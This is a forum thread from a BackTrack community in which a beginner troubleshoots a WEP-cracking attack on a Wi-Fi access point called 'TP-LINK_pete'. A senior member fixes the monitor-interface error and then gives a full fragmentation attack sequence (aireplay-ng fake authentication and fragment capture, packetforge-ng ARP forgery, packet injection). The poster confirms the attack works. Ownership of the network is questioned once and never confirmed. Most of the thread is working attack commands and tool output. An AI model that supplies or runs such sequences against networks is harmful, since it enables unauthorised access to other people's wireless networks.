Results 1 to 6 of 6

Thread: I do not understand what the problem with aireplay-ng

  1. #1
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    5

    Default I do not understand what the problem with aireplay-ng

    Hi.
    I'm a beginner with Backtrack 4.
    Backtrack with VMware.
    Usb adapter: TP-LINK TL-WN321G
    So:
    Code:
    airmon-ng stop wlan0
    ifconfig  wlan0 down
    macchanger --mac 00:11:22:33:44:55 wlan0
    airmon-ng  start wlan0
    Code:
    airodump-ng  wlan0
    BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
    00:27:19:C1:CB:BE  -76       36       29    0   3  54 . WEP  WEP         TP-LINK_pete
    Code:
    airodump-ng -c 3 -w wep --bssid 00:27:19:C1:CB:BE wlan0
    and #data speed: 5 / sec...
    Code:
    aireplay-ng -1 0 -a 00:27:19:C1:CB:BE -h 00:11:22:33:44:55 wlan0
    
    09:04:34  Waiting for beacon frame (BSSID: 00:27:19:C1:CB:BE) on channel 3
    
    09:04:34  Sending Authentication Request (Open System) [ACK]
    09:04:34  Authentication successful
    09:04:34  Sending Association Request [ACK]
    09:04:34  Got a deauthentication packet! (Waiting 3 seconds)
    
    09:04:37  Sending Authentication Request (Open System) [ACK]
    09:04:37  Authentication successful
    09:04:37  Sending Association Request [ACK]
    09:04:37  Got a deauthentication packet! (Waiting 5 seconds)
    
    09:04:42  Sending Authentication Request (Open System) [ACK]
    09:04:42  Authentication successful
    09:04:42  Sending Association Request [ACK]
    09:04:42  Got a deauthentication packet! (Waiting 7 seconds)
    Code:
    aireplay-ng -9 wlan0
    09:08:45  Trying broadcast probe requests...
    09:08:45  Injection is working!
    09:08:47  Found 1 AP
    
    09:08:47  Trying directed probe requests...
    09:08:47  00:27:19:C1:CB:BE - channel: 3 - 'TP-LINK_pete'
    09:08:47  Ping (min/avg/max): 0.524ms/5.426ms/9.897ms Power: -81.33
    09:08:47  30/30: 100%
    what the problem?
    Thanks for help.

  2. #2
    Senior Member hypervista's Avatar
    Join Date
    Feb 2010
    Posts
    121

    Default Re: I do not understand what the problem with aireplay-ng

    There are a couple of things for you to check;

    1) when you type the command: airmon-ng start wlan0 it should have returned a message telling you that "monitor mode enabled on mon0" or similar. The mon0 (or similar) is the interface you should be using in all subsequent commands, not wlan0.

    2) once you determine your target, you need to stop airmon-ng and re-start it specifying the target channel, i.e. (airmon-ng stop wlan0 followed by airmon-ng start wlan0 3) your interface card should be on the same channel as your target. Check to make sure that monitor mode was enabled once again on mon0 and use that monitor mode interface in your subsequent commands.

    It also appears your target AP is too far away.... pwr -76. Move closer. It's also possibe that your target has implemented MAC filtering. In that case you need to use a valid client MAC to fake-authenticate with. Are you sure you own the AP you're trying to crack?
    Last edited by hypervista; 05-10-2010 at 01:57 PM.

  3. #3
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    5

    Default Re: I do not understand what the problem with aireplay-ng

    Quote Originally Posted by hypervista View Post
    There are a couple of things for you to check;
    1) when you type the command: airmon-ng start wlan0 it should have returned a message telling you that "monitor mode enabled on mon0" or similar. The mon0 (or similar) is the interface you should be using in all subsequent commands, not wlan0.
    Code:
    13:06:07  Sending Authentication Request (Open System) [ACK]
    13:06:07  Authentication successful
    13:06:07  Sending Association Request [ACK]
    13:06:07  Association successful :-) (AID: 1)
    Thank you.

    but a new problem:

    Code:
    aireplay-ng -1 0 -a 00:27:19:C1:CB:BE -h 00:11:22:33:44:55 mon0
    aireplay-ng -3 -b 00:27:19:C1:CB:BE -h 00:11:22:33:44:55 mon0
    
    You should also start airodump-ng to capture replies.
    ^Cad 9950 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
    And #Data Speed: 8/sec

    Elapsed: 1 hour 30 mins
    PWR: -70
    Beacons 77600
    #Data: 40800

    I do not know why such a slow

  4. #4
    Senior Member hypervista's Avatar
    Join Date
    Feb 2010
    Posts
    121

    Default Re: I do not understand what the problem with aireplay-ng

    Well, you can try fragmentation, which will require a few more steps. After you successfully fake-authenticate, try this:

    Code:
    aireplay-ng -5 -b <target AP bssid> -h <iface (mon0) MAC> mon0
    Once a packet is captured it will ask "use this packet" - type Y for yes

    The resultant key stream will be captured and saved in a file with a .xor extension

    Then type:

    Code:
    packetforge-ng -0 -a <target AP bssid> -h <iface (mon0) MAC> -k 255.255.255.255 -l 255.255.255.255 -y <filename.xor (from previous step)> -w <anyfilename>
    Then inject your forged packet and watch the data packets increase:

    Code:
    aireplay-ng -2 -r <the anyfilename file you created in the previous step> mon0

  5. #5
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    5

    Default Re: I do not understand what the problem with aireplay-ng

    Thanks for help. All works

  6. #6
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    5

    Default Re: I do not understand what the problem with aireplay-ng

    delete.....
    Last edited by DaT630Da; 05-19-2010 at 06:02 PM.

Similar Threads

  1. Dos attacks, something that i don't understand
    By enas64 in forum OLD Newbie Area
    Replies: 5
    Last Post: 04-03-2009, 04:02 PM
  2. Don't understand what my USB chipset is?
    By kidshoalin in forum OLD Newbie Area
    Replies: 2
    Last Post: 02-27-2009, 11:35 AM
  3. Replies: 37
    Last Post: 12-21-2008, 02:43 PM
  4. i don't understand how to boot BT3
    By bluelat in forum OLD Newbie Area
    Replies: 12
    Last Post: 12-11-2008, 03:53 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •